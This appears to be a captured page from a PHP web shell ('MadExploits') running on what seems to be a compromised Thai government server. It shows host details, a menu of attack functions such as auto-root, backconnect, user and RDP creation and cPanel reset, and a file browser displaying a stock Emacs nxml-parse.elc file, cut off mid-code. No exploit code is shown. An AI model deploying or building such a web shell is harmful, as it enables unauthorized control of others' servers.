Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
nxml /
[ HOME SHELL ]
Name
Size
Permission
Action
TODO
13.76
KB
-rw-r--r--
nxml-enc.elc
3.56
KB
-rw-r--r--
nxml-glyph.elc
7.8
KB
-rw-r--r--
nxml-maint.elc
2.24
KB
-rw-r--r--
nxml-mode.elc
69.67
KB
-rw-r--r--
nxml-ns.elc
4.19
KB
-rw-r--r--
nxml-outln.elc
28.22
KB
-rw-r--r--
nxml-parse.elc
8.77
KB
-rw-r--r--
nxml-rap.elc
11.25
KB
-rw-r--r--
nxml-uchnm.elc
6.77
KB
-rw-r--r--
nxml-util.elc
4.41
KB
-rw-r--r--
rng-cmpct.elc
26.68
KB
-rw-r--r--
rng-dt.elc
1.97
KB
-rw-r--r--
rng-loc.elc
14.76
KB
-rw-r--r--
rng-maint.elc
6.12
KB
-rw-r--r--
rng-match.elc
47.01
KB
-rw-r--r--
rng-nxml.elc
14.93
KB
-rw-r--r--
rng-parse.elc
2.82
KB
-rw-r--r--
rng-pttrn.elc
3.69
KB
-rw-r--r--
rng-uri.elc
7.79
KB
-rw-r--r--
rng-util.elc
4.05
KB
-rw-r--r--
rng-valid.elc
35.72
KB
-rw-r--r--
rng-xsd.elc
24.32
KB
-rw-r--r--
xmltok.elc
39.71
KB
-rw-r--r--
xsd-regexp.elc
40.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nxml-parse.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:37 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/nxml/nxml-parse.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`nxml-parse.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\301\302!\210\301\303!\210\301\304!\210\301\305!\210\306B\307\306!\204 \310\306\311\"\210\311\207" [current-load-list require nxml-util xmltok nxml-enc nxml-ns nxml-parse-file-name default-boundp set-default nil] 3) #@1621 Either nil or a function called by `nxml-parse-file' to perform validation. The function will be called once for each start-tag or end-tag. The function is passed two arguments TEXT and START-TAG. For a start-tag, START-TAG is a list (NAME ATTRIBUTES) where NAME and ATTRIBUTES are in the same form as returned by `nxml-parse-file'. For an end-tag, START-TAG is nil. TEXT is a string containing the text immediately preceding the tag, or nil if there was no such text. An empty element is treated as a start-tag followed by an end-tag. For a start-tag, the namespace state will be the state after processing the namespace declarations in the start-tag. For an end-tag, the namespace state will be the state before popping the namespace declarations for the corresponding start-tag. The function must return nil if no error is detected or a cons (MESSAGE . LOCATION) where MESSAGE is a string containing an error message and LOCATION indicates what caused the error as follows: - nil indicates the tag as whole caused it; this is always allowed; - text indicates the text caused it; this is allowed only if TEXT is non-nil; - tag-close indicates the close of the tag caused it; this is allowed only if START-TAG is non-nil; - (attribute-name . N) indicates that the name of the Nth attribute caused it; N counts from 0; this is allowed only if START-TAG is non-nil and N must be less than the number of attributes; - (attribute-value . N) indicates that the value of the Nth attribute caused it; N counts from 0; this is allowed only if START-TAG is non-nil and N must be less than the number of attributes. (defvar nxml-validate-function nil (#$ . 849)) #@1561 Parse the XML document in FILE and return it as a list. An XML element is represented as a list (NAME ATTRIBUTES . CHILDREN). NAME is either a string, in the case where the name does not have a namespace, or a cons (NAMESPACE . LOCAL-NAME), where NAMESPACE is a symbol and LOCAL-NAME is a string, in the case where the name does have a namespace. NAMESPACE is a keyword whose name is `:URI', where URI is the namespace name. ATTRIBUTES is an alist of attributes where each attribute has the form (NAME . VALUE), where NAME has the same form as an element name, and VALUE is a string. A namespace declaration is represented as an attribute whose name is (:http://www.w3.org/2000/xmlns/ . LOCAL-NAME). CHILDREN is a list containing strings and child elements; CHILDREN never contains two consecutive strings and never contains an empty string. Processing instructions and comments are not represented. The return value is a list representing the document element. If the XML document is not well-formed, an error having the condition `nxml-file-parse-error' will be signaled; the error data will be a list of the form (FILE POSITION MESSAGE), where POSITION is an integer specifying the position where the error was detected, and MESSAGE is a string describing the error. The current contents of FILE will be parsed even if there is a modified buffer currently visiting FILE. If the variable `nxml-validate-function' is non-nil, it will be called twice for each element, and any reported error will be signaled in the same way as well-formedness error. (defalias 'nxml-parse-file #[(file) "\212\302!q\210\303\216\304 +\207" [file nxml-parse-file-name nxml-parse-find-file ((kill-buffer nil)) nxml-parse-instance] 2 (#$ . 2524)]) (defalias 'nxml-parse-find-file #[(file) "\212\302\303!q\210\304 \210\305\306 !\210)p)\207" [set-auto-coding-function file get-buffer-create " *nXML Parse*" erase-buffer nxml-set-xml-coding insert-file-contents] 2]) (defalias 'nxml-parse-instance #[nil "\306\211\306\211\211\211\211\211\211\211\n\f \307 \210\310 \210\311 .\207" [xmltok-dtd xmltok-errors xmltok-dependent-regions xmltok-namespace-attributes xmltok-attributes xmltok-replacement nil xmltok-forward-prolog nxml-check-xmltok-errors nxml-parse-instance-1 xmltok-name-end xmltok-name-colon xmltok-start xmltok-type nxml-ns-initial-state nxml-ns-state] 10]) (defalias 'nxml-parse-instance-1 #[nil "\306\211B\211\306\211\306\211\307 \203\337 \310 \210 \311>\203\261 \f\2030 \312\313\f\237\" \f\306B\241\210 A \314=\204o \204F =\204F \315\306\316\"\210\317 B\320 \210\321 !\322\f !#\210\306 !\306B\241\210 A\211\nB\323!!) \324=\204\254 \325=\204\230 @\326 \232\204\230 \203\223 \315\306\327@#\210\202\230 \315\306\330\"\210\322\f \306#\210\306\331 \210A\n@\nA\306\202 \332>\203 \203\313 \204\303 \"\333 \fB\202 \334=\204 \315\306\335 \336\236A#\210\202 A\204\351 \315d\337\"\210\211#A@.\207" [top tail tail-stack open-element-tags text text-pos nil xmltok-forward nxml-check-xmltok-errors (start-tag end-tag empty-element) apply concat end-tag nxml-parse-error "Multiple top-level elements" xmltok-start-tag-qname nxml-ns-push-state nxml-parse-start-tag nxml-validate-tag last start-tag empty-element xmltok-end-tag-qname "Unbalanced end-tag; expected </%s>" "Extra end-tag" nxml-ns-pop-state (space data entity-ref char-ref cdata-section) nxml-current-text-string space "%s at top-level" ((data . "Text characters") (entity-ref . "Entity reference") (char-ref . "Character reference") (cdata-section . "CDATA section")) "Missing document element" xmltok-type tag xmltok-start x] 6]) (defalias 'nxml-parse-start-tag #[nil "\306\211\211\211\211\211\211\211\211\211\203 @\307 !\206+ \310\306\311\"\312 !\313 !\2059 \314 !\211\f\235\203H \310\306\315\"\210\202d \204S \316\n!\210\202d \n\203_ \317\n\"\210\202d \310\306\320\"\210\fB\321\314 !\" BBA\211\204 \321\322 \211\203\227 \323!\206\231 \310T\324#\202\231 \325 )\326 \" \211\203\373 @\313 !\211\205\302 \323!\206\302 \310 \211\327H)\324#)\321\n\314 !\"!\330!\"\203\337 \310 \211\327H)\331\"\210!\307 !\206\353 \310\306\311\"B)BA\211\204\246 \203\244\237. D\207" [name value ns prefix prefixes att nil xmltok-attribute-value nxml-parse-error "Invalid attribute value" nxml-make-namespace xmltok-attribute-prefix xmltok-attribute-local-name "Duplicate namespace declaration" nxml-ns-set-default nxml-ns-set-prefix "Cannot undeclare namespace prefix" nxml-make-name xmltok-start-tag-prefix nxml-ns-get-prefix "Prefix `%s' undeclared" nxml-ns-get-default xmltok-start-tag-local-name 0 assoc "Duplicate attribute" atts parsed-namespace-attributes parsed-attributes xmltok-namespace-attributes nxml-xmlns-namespace-uri xmltok-start xmltok-attributes nm] 10]) (defalias 'nxml-validate-tag #[(text text-pos tag) "\205) \n\"\306\211\205( \307\fA \205 \n#\211\204# \310\311\"\210\312\f@\"*\207" [nxml-validate-function text tag pos err text-pos nil nxml-validate-error-position error "Incorrect return value from %s" nxml-parse-error] 5]) (defalias 'nxml-validate-error-position #[(location text-pos tag) "\204 \207\306=\203 \n\207\307=\203&